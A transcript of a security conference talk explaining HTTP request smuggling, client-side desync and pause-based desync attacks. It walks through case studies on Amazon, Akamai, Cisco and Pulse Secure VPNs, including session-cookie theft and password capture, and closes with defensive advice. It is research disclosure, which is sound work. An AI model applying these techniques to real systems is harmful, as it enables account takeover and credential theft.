 Greetings. Welcome to track 4. This is the 3.30pm talk. This is James Kettle. He's going to talk about browser powered desync attacks. Thank you. Good afternoon and welcome to browser powered desync attacks. Have you ever had an idea and then just dismissed it because there's no way that that would ever work? Three years ago, I thought, wouldn't it be cool if you could make browsers launch desync attacks? That would enable some really interesting possibilities. But I figured that there was no way that any web server was doing something foolish enough to make that possible. This year I discovered I was completely wrong. You can achieve all manner of interesting things and in this session I'll show you how. Like many discoveries, the journey that led to it was quite windy. It started in late 2019 when there was a spate of request smuggling false positives, even including an incorrect CVE being issued for engine X. I had a look at what the cause of this issue was and declared that there was a simple solution. All you had to do was never reuse HTTP1 connections when looking for request smuggling. And after that, well, everything was wonderful until last year when I realised that connection locked request smuggling was a thing and the only way to find that is to always reuse HTTP1 connections. So at this point we had a bit of a problem and this year I set out to tackle this and after quite a lot of work I eventually found that by slowing things down and paying really close attention to the exact sequence of events, I could reuse connections and still distinguish genuine vulnerabilities from false positives. And that was nice but sometimes when you pay extra close attention to things, you find more than you bargained for. And on one website I noticed something just wasn't quite right and I pulled on that thread and the attack that I ended up with broke my mental model for request smuggling because this attack could be launched from the user's browser, which meant it didn't require an attacker and that meant it didn't even require the vulnerable site to have a front-end server and that opens a whole new frontier of attack surface. So today I'm here to share with you a methodology and toolkit that I've built to navigate this new world, demonstrated with exploits on targets including Apache, Akamai, varnishamazon.com and multiple web VPNs. First we're going to get warmed up with HP handling anomalies. After that I'll share the client-side de-sync methodology using four in-depth case studies. Then I'll introduce pause-based de-sync and attempt a live demo because it's so cool I couldn't resist. Then I'll talk about defence key takeaways for the research and wrap up with five minutes of questions. Now there's quite a few different techniques in this presentation and I really want them to work for you. So as part of that whenever you see this logo on a slide that means my team's built an online replica website with that vulnerability in it. So you can practice that technique on a real system online for free. I'm also releasing the code that powered every finding in this presentation and whenever there's a named target you'll find four proof of exploit code in the white paper even if I haven't managed to squeeze it onto a slide. Now we're going to start with a series of six esoteric vulnerabilities that directly led to the discovery of client-side de-sync attacks but are also really quite interesting in their own right. But first there's something I need to tell you. The request is a lie. HTTP requests are a useful abstraction but the harder you try to hold on to this concept the less sense these techniques are going to make. At the end of the day all we're doing is sending a stream of bytes and what the server does with that is up to it. For example it's all too easy to forget about HTTP connection reuse because HTTP is supposed to be stateless but sometimes stake and creep in. Take this website that I found but sadly can't name. They had a reverse proxy in front and it was set up to let me access sites intended to be public and not to access private sites on their intranet. And it was deciding where to route the request using the host header. But this front end was only validating the host header of the first request on each TCP connection so I could just send a request to the legit site and then gain access to the internal systems. Now fortunately this bug is quite rare but there's a more common variation that I'll call first request routing. Here the front end server looks at the first request to work out which backend to route it onto but then it passes all subsequent requests on that connection straight through to the same backend system. By itself this behavior is not really a vulnerability but you can use it to hit any backend with an arbitrary host header so you can use that to form part of an exploit chain that would otherwise be impossible. In this example here I want to hit the backend with a poisoned host header so I can trigger a poisoned password reset email but doing that directly isn't possible because the front end doesn't know where to route it to. But once again I just send a legit request first and then follow it up with the attack and we successfully get a poisoned password reset email and hopefully access to someone's account. So hopefully that simple technique will come in useful for you but there's also a broader takeaway here which is that it's really good to peel away these abstractions sometimes because they can hide behavior that's really quite important. On to request smuggling. Well you know the deal with this hopefully you just make the front end and back end disagree about the length of a HTTP request. You use that to apply a malicious prefix shown in orange to the victims request and that makes bad things happen to the victim. To encourage this disagreement to happen you generally obfuscate the transfer encoding header to hide it from one of the servers. So I was a bit puzzled when I found that I could trigger really suspicious behavior on a large number of websites using AWS's application load balancer using this HTTP2 request. If you look at this request you might wonder where the attack is because this is a legitimate HTTP2 request it's spec compliant there isn't any obfuscation there or anything like that and yet somehow this was causing some kind of desync on these websites. After spending quite a while investigating it as usual I eventually decided what Amazon must be doing is inexplicably adding a header that said actually this message is chunked when they forwarded it onto the back end but not actually chunking it. And well once I knew that it was easy to turn this into an exploitable desync and hack a bunch of sites so that was nice. I reported it to Amazon and they fixed it really quite quickly too. But it left the question well why was Amazon doing that? Why did that even happen? And I think it's because web browsers always send a content length header even when they're using HTTP2 even though that is not required over HTTP2. And so Amazon just ended up with logic that said well if there isn't a content length header I guess it must be chunked. So that was a handy finding but the real value of it was in the takeaway which is that for request smuggling you don't necessarily need header obfuscation or any kind of ambiguity. All you need is a server taken by surprise. We're going to come back to that shortly. Now let's take a closer look at the connection locked HP1 request smuggling issue mentioned earlier. So to confirm regular request smuggling you send two requests you confirm the first request affects the response to the second as shown here. And this works great provided you send those two requests over separate connections but to find a connection lock vulnerability you have to send them over the same connection like this. Now here we're sending and receiving exactly the same bytes as shown on the previous slide but now we have a problem because we can no longer tell where the front end thinks the first request ends. And that means we can't tell if this system is actually vulnerable or not. The solution here is to realize that these bytes that we're getting back aren't the only information that we have. We also have timing information. If the front end server thinks our message is chunked that means it's already starting to generate a response before we send the orange payload. So if we pause before sending that payload and check the socket and we see a response coming back that tells us they're not using the content length. They think this message is chunked and they're not vulnerable to a CLT desync. Meanwhile if we try to read and we don't get any data back for a few seconds and then the rest of the attack pans out as usual that proves the front end must be using the content length and therefore are actually vulnerable. So I took that technique. I automated it and I went scanning. And I found a few things. One of the mildly notable things was there was a vulnerable system that was vulnerable because they were running Barracuda's web application firewall in front of IIS. Obviously it's old news. You put a web application firewall in front of something that makes it easier to hack. But what was particularly interesting here was Barracuda had actually issued a patch for this problem but they hadn't flagged it as like a full-on security fix. They just said it was just a speculative hardening measure. So as such the client hadn't bothered to install it and it was vulnerable. As usual though the best desync I found with this technique was the one that initially made absolutely no sense. After extensive testing I was able to refine the attack sequence into this. Now there's two things to unpack here. First off as you can see the back end server is completely ignoring the content length here. So that means this is a seal.zero desync which is a rare attack class that hasn't been widely researched. Secondly is well why are they ignoring that content length? There's no reason. They're just ignoring it because they feel like it. It never occurred to me that a server might just arbitrarily ignore the content length on a completely valid HP1 request. And that has implications. It also left me wondering given that I found this by accident with a scanning technique that wasn't even designed to find this, well how many sites am I going to find if I go deliberately looking for this type of vulnerability? The answer was quite a few. My favourite one was amazon.com. So they ignore the content length on post requests sent to the path slash b. Using this I got a server side desync so I made a simple proof of concept which stored random live users HP requests including their credentials inside my amazon wishlist. So I send this request a few times, I reload my wishlist and I've got some other random people session cookies. So I reported that to Amazon. They fixed it at some point. And then I realised that I made a terrible mistake because I could have done a much cooler attack. This request exploits a random live user, right? And the request is a legitimate HP request that can be triggered by a web browser. So if I'd used the head technique to execute JavaScript in the victim's browser, I could have made every user that got hit by this spread the attack to 10 other users. Thereby making a self-spending desynchronisation worm and compromising every active user on Amazon. So that was a cool finding, missed opportunity too. And also a hint at an entire new attack class, client side desync. Every desync, every request muggling vulnerability that we've seen to date has desynchronised the connection between the front-end server and the back-end server. But if you can make a web browser send a request that causes a desync like you could on Amazon, then you can target the browser's own connection pool. And that means you can exploit sites that don't have a front-end back-end architecture. This attack starts with the victim visiting the attacker's website, which sends two requests to the target site. The first request desynchronises the browser's connection to that website so that the second request triggers a harmful response to go back to the victim and give the attacker control of the victim's account. To build these attacks, I've adapted the methodology from classic request smuggling. The main difference is that our entire exploit here needs to run in our victim's web browser, and that is an environment that's a lot more complex and uncontrolled than a dedicated hacking tool. So it's crucial to periodically take your technique as you've got it working inside your tool and try out in the browser to make sure that it works as expected in the real environment that you want the attack to work in. Tooling-wise, I did all of this with custom code, which I've just released to GitHub, but I also helped design a new Burp Suite feature called Send Request Sequence, which offers similar functionality with a bit of a gentler learning curve. For the target browser, this technique seems to work on all browsers pretty much equally. Personally, I focused on Chrome because Chrome has the best developer tools for building this kind of exploit. The first step towards a successful attack is to identify your client-side desync vector. This is a HTTP-1 request with three key properties. First and foremost, the server needs to ignore the content length of this request. This will typically happen because you've triggered some kind of server error or because you've taken the server by surprise, it just wasn't expecting a post request to that endpoint. For example here, this is one of the more effective techniques. I'm just doing a post request to a static file. They don't expect it, and as such, if the server is vulnerable, they're likely to ignore the fact that I've said I'm going to send more content than I actually have. I've sent content length 5, I've sent one byte of data. If the server replies to this request immediately, it suggests that they're ignoring the content length I've sent, and they're quite likely to be vulnerable. Secondly, this request needs to be triggable across the main inside a web browser. That means you can't use things like header obfuscation, and you can't even specify any special headers, really. Also, the target server can't advertise support for HTTP2 because this is an attack that exploits the fact that HP1 is dire, and browsers will aggressively prefer to use HP2. The only scenario where a site that uses HP2 is going to be exploitable via this is if your target victim is using a core proxy or something that only supports HP1, which is fairly unlikely. Finally, the server needs to leave the connection open after it's handled this request. Once you've found this, the next step is just take that and see if it works inside a real browser, which you can do with some JavaScript that looks something like this. Here, we're sending two requests, and the first one is going to desync the connection, and the second request is just a browser navigation, and that should hopefully suffer the consequences of the connection being desynced. Now, there's two flags worth mentioning in this attack request. First off, I'm specifying mode no-course. This is not required for a successful attack, but what it does is it means we can actually see what's happening inside the developer tools, so it's useful for debugging things when things go wrong, which they will do quite a lot. Secondly, I'm specifying credentials include. This is really important because browsers have multiple connection pools per website, and if you poison the wrong connection pool, then I can promise you an extremely frustrating time. So I specify that, and you'll probably poison the right one. Now, when you run this, if it's successful, you should see two requests in the dev tools with the same connection ID, and you should see that the second response has been affected by the malicious prefix from the first request as shown here, and at this point, it's just time to build an exploit. This is quite a powerful primitive, so you've got three main options. First off, you can try to store the user's request somewhere where you can later retrieve it, kind of like I did on Amazon, and that works just the same as regular server-side request smuggling, so I'm not going to waste any time talking about it in more detail. Secondly, there's an all-new option, which is chaining and pivoting. So a client-side desync means that you can make your victim's browser send arbitrary bytes to the target website. So what it does is it turns their browser into your personal attack platform, and it puts extra attack surface within your reach. For example, you can make them put log for shell payloads wherever you like, and you can even hit authenticated attack surface using their credentials in a way that's a bit like cross-site request forgery, but not more powerful because it doesn't have all the limitations that browsers normally put on cross-term main requests. What I'm going to focus on, though, is exploiting the end user. I've tried a lot of different techniques and had the most success with two well-known approaches from server-side request smuggling with certain tweaks applied that we're going to have a look at in the case studies. So for our first case study, we're going to exploit a straightforward vulnerability that affected a huge number of websites built on the CDN Akamai. This attack vector is nice and simple. To cause a desync, you just need to do a post request that triggers a redirect from the front-end. Confirming this in a browser is also really easy. Here, I've just crafted the prefix so that when the browser follows this redirect from the front-end, it ends up seeing the contents of the robots.txt file. For the exploit, I'm going to use the head technique. Now, if you're not familiar with this technique, it's documented in more detail in last year's presentation on HTTP2, but the short version is, with the head technique, you use the method head to queue up multiple responses that, when combined, are harmful and let us execute JavaScript from the target site in our victim's browser. And when you're doing server-side request smuggling, it's that simple. But because this is client-side, there's a couple of other things that we need to fix first. The first problem is that the initial request coming back to the web browser is a 301 redirect. And as such, the browser is just going to follow that redirect, and that's going to use the poison connection and mess up our attack. The second problem is the stacked response problem. Whenever Chrome reads in a response from the server, it deliberately does a little overread. It tries to read more data than the server said it was going to send, just to see if there's any extra data lying around. And if it sees anything, it quietly dumps the connection and breaks the attack. So, fortunately, both issues are easily resolved on Akamai. So you can fix the stacked response problem by delaying the second response, so it arrives after Chrome does its little check. So in this scenario, I was able to do this by adding a cache buster to the request so that it incurred a cache miss, and it went all the way to the back end, which was slow and old, and therefore took ages to respond and meant that it arrived late and Chrome didn't see it. The second problem of the browser redirect is easily fixed by changing mode no cause to mode cause, which means when the browser sees the redirect, it throws an exception, which we can then catch ourselves and continue with our attack, ultimately leading to a successful exploit. For our next target, we'll hit Cisco's web VPN. This technique seems to work on lots of web VPNs for some reason. I think it's because they tend to code their own web servers for security reasons, which backfires. So here, we can trigger a desync simply by doing a post request to their home page. It couldn't be much easier, to be honest. And with that, we can easily trigger a redirect to our website. And in theory, that redirect could let us redirect a JavaScript resource load and let us take full control over the page. But there's a bit of a problem, because when a web browser renders a page, it loads all the resources at the same time, and that makes it really quite hard to successfully hijack the correct file. Fortunately, there was an easy solution on this target, because this redirect response is cacheable. So if we poison the connection with our redirect, and then we tell the browser to navigate to the target JavaScript file, which is slash win.js here, then they'll get that redirect back, and they'll just get bounced back to our website by the redirect. But they'll also save the redirect in their cache. So when they land back on our website, we can send them onwards to the web VPN's login page. And when the login page starts to get rendered, it's going to try and load that JavaScript file and end up loading our poisoned version from the cache and importing our JavaScript and giving us the user's password. So I reported this to Cisco, and they didn't say anything for a while, and then they said, they're going to deprecate this product, so they're not going to fix this issue. But they are issuing a CVE for it. So that's nice. I hope you're not using it. On verisign.com, you could trigger a desync using a URL encoded forward slash. Don't ask me how I found that. But unfortunately, that wasn't the only thing a bit unusual about their setup. For reasons that I don't have time to explain in any detail, to get a working exploit, I had to use the head technique, but I had to do it with a head request that had a body, and the body had to be chunked, which meant I had to judge the chunk size so the follow-up request would perfectly slot inside that chunk and close off the request. This unbelievably did actually work, but the interesting thing here, the reason this is worth mentioning is because this approach is exclusive to client-side desync. If you're doing a server-side desync, you don't control what the next request to hit the server is going to be, so you can't accurately predict its size, and this technique is basically completely implausible. So it's worth bearing in mind that although client-side desync can be quite painful sometimes, you do have options. Speaking of painful, for our final case study, we're going to target pulse-secure VPN. Here, you can do a desync by doing a post-request to the robots.txt file, and just like Cisco's WebVPN, they've got a host header redirect gadget that we'd like to use to hijack a JavaScript import, but this time the redirect isn't cashable. So we're in this unpleasant scenario where our attack timing is crucial, and I had to take three steps to make this remotely reliable. First off, I pre-connect the victim browser with the target site to reduce the effect of network jitter on the attack timings. This might not make any difference, but I was kind of desperate. Secondly, our attack is going to fail sometimes, so it's essential that we can have multiple attempts, but a failed attempt leaves the victim on the target website out of our control. So to deal with that, I just run the attack in a separate tab, which just means we can have as many attempts as we like, except for one other potential problem, which is that if an attack fails and the browser ends up caching the genuine JavaScript file, then we can't poison that file until that cache entry has expired, which could be weeks. But I was able to avoid that issue by finding a page on pulse-secure's VPN that had a JavaScript import that never got cached because the file they were trying to import didn't actually exist. So by combining all of these, we got a successful attack, which hopefully looks something like this. Yeah, so you can see a tab pops open, and then the victim site gets reloaded a couple of times, and we get control. I reported that to pulse-secure VPN, and to be honest, I'm not sure what's happened. They didn't say anything for ages, and then they said they fixed it, but I can't find the fix. So who knows? Now, we saw earlier that slowing down and pausing can reveal useful information, and as it turns out, pausing can also create entire new desync vulnerabilities. To trigger a pause-based desync on a vulnerable server, you start by sending your headers, processing a body, but not sending it and then just waiting. Eventually, you'll get a response, generally after a server time-out is hit, and then when you finally send the body, they'll treat that as a new request. I initially found this on Varnish, and just in case you think that was really clever of me, it was actually because of multiple bugs in my code combined to trigger this condition. But once I saw it on Varnish, I was like, oh, that's cool, that's what I'm looking for, and I found it works on Apache, too, which is pretty cool. And it tends to happen when the server generates a response itself instead of forwarding the request to the backend server or handing it off to the application layer, and this single vulnerability enables two distinct attacks. So first off, we're going to use it to cause a traditional server-side desync. The front-end server must stream the request to the backend. In particular, it must forward the request headers without attempting to buffer the entire request body first. So to find the bug here, well, you send your headers and you wait for their time-out, but you probably won't realize when the time-out happens on the backend because the front-end, generally, won't forward the response on to you until they've seen you send a complete request. So in practice, you need to send your headers, wait until you think a time-out has probably happened on the backend, and then send the rest and the next request and hopefully get a successful attack. So I've updated Turbo Intruder to add a couple of different ways of saying where in the request you want to pause and how long you want to pause for. So that's it. It's fairly simple. And you might be wondering, well, what front-end servers actually stream requests like this? To be honest, I couldn't be bothered looking at very many, but it worked on the first one I tried, which was Amazon's application load balancer. However, there's one extra catch, which is that they've got a defensive measure I'll call early-response detection. It's a bit like the Chrome behavior we saw earlier, but it's slightly different. So if Amazon's ALB sees the response coming in from the backend before our request is completed, then they'll follow that response on, but then they'll dump the connection. They won't reuse it on our attack or fail. Fortunately, this seems to be designed to prevent bugs rather than actual attackers, and there's a really obvious race condition in it, so it's quite easy to bypass. All you need to do is identify the backend timeout and make the orange payload, hit the front-end in the time window between the backend generating that timeout response and the front-end noticing it. In other words, basically, this attack may take a few attempts, but it's worth it. There's one final challenge that you might encounter, which is more severe. This is when the front-end and the backend have the same request timeout configured. On ALB, that creates a race condition within a race condition and makes life incredibly painful. I thought it might be possible to avoid this issue by resetting the front-end timeout without me sending in the backend timeout by sending data that the front-end normalizes and then doesn't send on to the backend. And that might work on some servers, but it didn't work on ALB, and after a while of everything I tried failing, even when it was really cool conceptually, I just gave up and I just set a vanilla attack running. And 66 hours later, it was successful. So this is one for the patient. So that was a server-side pause-based desync. And it just leaves us with one final question, which is, well, is there such a thing as a client-side pause-based desync? Now, I couldn't find a way to make a browser pause halfway through issuing a request. But SSL and TLS don't stop attackers from delaying your traffic. So there is a potential attack where the attacker triggers a request from your browser that's really big so it gets split into multiple packets. And then all they have to do is delay the right packet and they can trigger a pause-based client-side desync and exploit you. Now that might sound quite theoretical. It certainly sounded theoretical to me. And this is Defcon. So I've made a proof of concept that uses this technique on a default Apache-based website to execute arbitrary JavaScript and kind of break TLS. And now I'm going to attempt a live demo. The code on the client-side looks fairly like a regular client-side desync, but we've got tons of padding to make the request big so it gets split into multiple packets. On the attacker's middle box, I used the traffic control facility with some code like this that just says delay the packet to the target site by 61 seconds if it's in between 700 and 1,300 bytes because that seems to work. As you may guess, this is not the world's most reliable technique because you obviously can't decrypt the packets. They're encrypted. You just look at how big they are and kind of guess. But let's have a go and see what happens. Okay, cool. So I'm going to make the victim browser is just going to socks proxy to a box on Amazon that's being man in the middle just so the local network doesn't blow things up too much. It's just a socks proxy. It's not breaking or anything like that. Here we're going to connect to the attacker machine. Apologies about the size of the font. What if I do this? Yeah, okay. So here we can see this code. I've got the injects, the delay. The only change is I'm just doing a six second delay here because I reduced the server time out so that the demo doesn't take ages. And I'm running TCP dump on the attacker's box. So if the attack works, if the browser decides to send the correct packet size for me, then we're going to see a few packets go through and then one large packet being re-sent over and over. That's because the victim machine knows it hasn't been received by the server because we're delaying it. So it's just trying to re-send it. That's just TCP. But the attacker is delaying all of these re-send attempts until it finally lets them through. We get a client-side desync, and if it's successful, we'll see the attacker's box in the victim browser. So as you can see, I've just got the attack code shown earlier here. I'm going to hit execute.js, and we'll see what happens. Okay, great. We can see one packet being re-sent a bunch of times, and over here, in about three seconds, maybe, yes. There we go. Thanks. So that was... Oh, so we don't even need the backup video. All right. So, yeah, hope you enjoyed that demo. That was the final attack of the presentation. Hopefully, most of them made sense. Let's talk about defence. These attacks almost all exploit HP1. So if you can, I would recommend using HP2 end-to-end. That said, if you can't use it end-to-end, don't do HP2 downgrading because that makes things even worse. Now, secondly, I don't know how people are going to react to this, but my view is, it's really easy to make a HP1 server but really difficult to make a HP1 server that's secure. So I would say, don't code your own HP server if at all possible. That said, software diversity is a healthy thing, so here's some advice that will help make your server slightly less prone to these kinds of vulnerabilities if you need to patch one of these vulnerabilities and using HP2 end-to-end is not an option. Now, I've got a nice bonus slide for DefCon. I think this topic has serious potential for further research. So I'm going to outline seven possible research angles roughly in order of the time commitment required and how likely I think they are to actually work. First off, more ways of making a browser, of making a server ignore the content length would be really valuable. You can use these for both a server-side desync and a client-side one, especially if it is triggered by a request that you can use from a web browser. Secondly, as we've seen, client-side desync exploitation can be quite hard, so more ways of building exploits would be really valuable. And in particular, the whole chain and pivot exploit path was researched. It basically didn't occur to me until I was writing the presentation. So I think you might even, because you can send arbitrary bytes, you might even be able to fake a protocol upgrade and change protocol to web sockets or something which might be fun. Fourth, currently, server-side pause-based desync vulnerabilities are really hard to detect. You're best off basically looking for the server banner that says they're using Apache and then trying the technique. So a reliable way to find this issue when the vulnerable server's behind a front-end would be really nice. And also, it would be amazing if you could trigger a pause-based desync without needing a man in the middle. It feels like something that should be possible. It should be possible to make a browser just still halfway through a request. Somehow. I just don't have no idea. Sixth, this is a valuable attack class right now, but it's going to get less valuable over time as HP2 adoption increases unless someone figures out a way of forcing browsers to use HP1. Again, I've got an idea, but it might be possible. And finally, I think this one's a pretty good lead. Exploration of equivalent attacks on HP2. I've seen some hints that vulnerability similar to client-side desync could happen with HP2. I don't think it's going to be as common because it kind of requires like a state machine floor on the server, but I'm fairly sure it will happen sometimes and that would be quite nice. So there's plenty of further reading available. The three things I'd suggest are, check out the white paper which also includes these slides. That's the top link on this page. Have a shot at the online interactive labs to get some real experience with this technique and then grab the tools I've released, do some scanning and find some real vulnerable systems. Feel free to chat with me in email and let me know how it goes. Also, there's a kind of related presentation tomorrow by Martin which is really good. I would suggest checking that out if you enjoyed this. And finally, the three key things to take away are the request is a lie. HP1 connectionary use is harmful and all you need is a server taken by surprise. I'll take five minutes of questions now. If you have any more after that, feel free to come and chat to me at the back or just chuck me an email. Don't forget to follow me on Twitter. Thank you for listening. Any questions? Yep. Could the attack work on HP2 servers that have a HP1 server in front? Yes, you could do a client-side desync on that potentially. Cool, thank you.